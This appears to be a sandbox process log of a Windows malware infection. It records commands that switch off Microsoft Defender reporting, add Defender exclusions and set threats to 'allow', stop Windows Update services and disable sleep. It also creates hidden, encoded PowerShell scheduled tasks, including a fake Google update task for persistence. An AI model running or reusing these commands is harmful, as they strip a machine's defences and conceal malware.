/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4544 -s 2308

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gJYclSvLF" /SC once /ST 00:13:58 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\system32\schtasks.exe

"schtasks" /Create /TN "DigitalPulseUpdateTask" /SC HOURLY /TR "C:\Users\Admin\AppData\Roaming\DigitalPulse\DigitalPulseUpdate.exe"

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64

C:\Users\Admin\AppData\Roaming\DigitalPulse\DigitalPulseService.exe

"C:\Users\Admin\AppData\Roaming\DigitalPulse\DigitalPulseService.exe" 5333:::clickId=:::srcId=

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gJYclSvLF"

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /delete /f /tn "GoogleUpdateTaskMachineQC"

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Users\Admin\AppData\Local\Temp\xyvvnnvseiqa.xml"

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

\??\c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gJYclSvLF"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "bAutabDQFHrvmwrWbf" /SC once /ST 00:57:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\mgmyLlQChgHxZYvqY\rqBhQmxZHCWBdIf\rJZnUge.exe\" F9 /Sbsite_idVQt 385120 /S" /V1 /F

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310070055461\assistant\Assistant_103.0.4928.25_Setup.exe_sfx.exe

"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310070055461\assistant\Assistant_103.0.4928.25_Setup.exe_sfx.exe"

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310070055461\assistant\assistant_installer.exe

"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310070055461\assistant\assistant_installer.exe" --version

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310070055461\assistant\assistant_installer.exe

"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310070055461\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=103.0.4928.25 --initial-client-data=0x248,0x24c,0x250,0x224,0x254,0x1361588,0x1361598,0x13615a4

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Users\Admin\AppData\Local\Temp\mgmyLlQChgHxZYvqY\rqBhQmxZHCWBdIf\rJZnUge.exe

C:\Users\Admin\AppData\Local\Temp\mgmyLlQChgHxZYvqY\rqBhQmxZHCWBdIf\rJZnUge.exe F9 /Sbsite_idVQt 385120 /S

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Users\Admin\Pictures\cVQuTwlBIqJuiJxb3lrvqGNO.exe

"C:\Users\Admin\Pictures\cVQuTwlBIqJuiJxb3lrvqGNO.exe"

C:\Users\Admin\Pictures\VI9xk37vZ1hPxGyqkplQbk0H.exe

"C:\Users\Admin\Pictures\VI9xk37vZ1hPxGyqkplQbk0H.exe"

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\OiHosHQWLYYU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\OiHosHQWLYYU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YdsaQErHTmUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YdsaQErHTmUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\gefgkCSEQETIoGatBxR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\gefgkCSEQETIoGatBxR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\pvBOaSctU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\pvBOaSctU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\tQfvhaKXOVswC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\tQfvhaKXOVswC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\WchZBSEVnXkPOBVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\WchZBSEVnXkPOBVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\mgmyLlQChgHxZYvqY\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\mgmyLlQChgHxZYvqY\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\BpGCpHbZnuKjDRvE\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\BpGCpHbZnuKjDRvE\" /t REG_DWORD /d 0 /reg:64;"

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Windows\TEMP\xyvvnnvseiqa.xml"

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OiHosHQWLYYU2" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OiHosHQWLYYU2" /t REG_DWORD /d 0 /reg:32

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OiHosHQWLYYU2" /t REG_DWORD /d 0 /reg:64

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YdsaQErHTmUn" /t REG_DWORD /d 0 /reg:32

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YdsaQErHTmUn" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gefgkCSEQETIoGatBxR" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gefgkCSEQETIoGatBxR" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\pvBOaSctU" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\pvBOaSctU" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tQfvhaKXOVswC" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tQfvhaKXOVswC" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\WchZBSEVnXkPOBVB /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\WchZBSEVnXkPOBVB /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\mgmyLlQChgHxZYvqY /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\mgmyLlQChgHxZYvqY /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\BpGCpHbZnuKjDRvE /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\BpGCpHbZnuKjDRvE /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "goylhAwiC" /SC once /ST 00:12:45 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\System32\cmd.exe

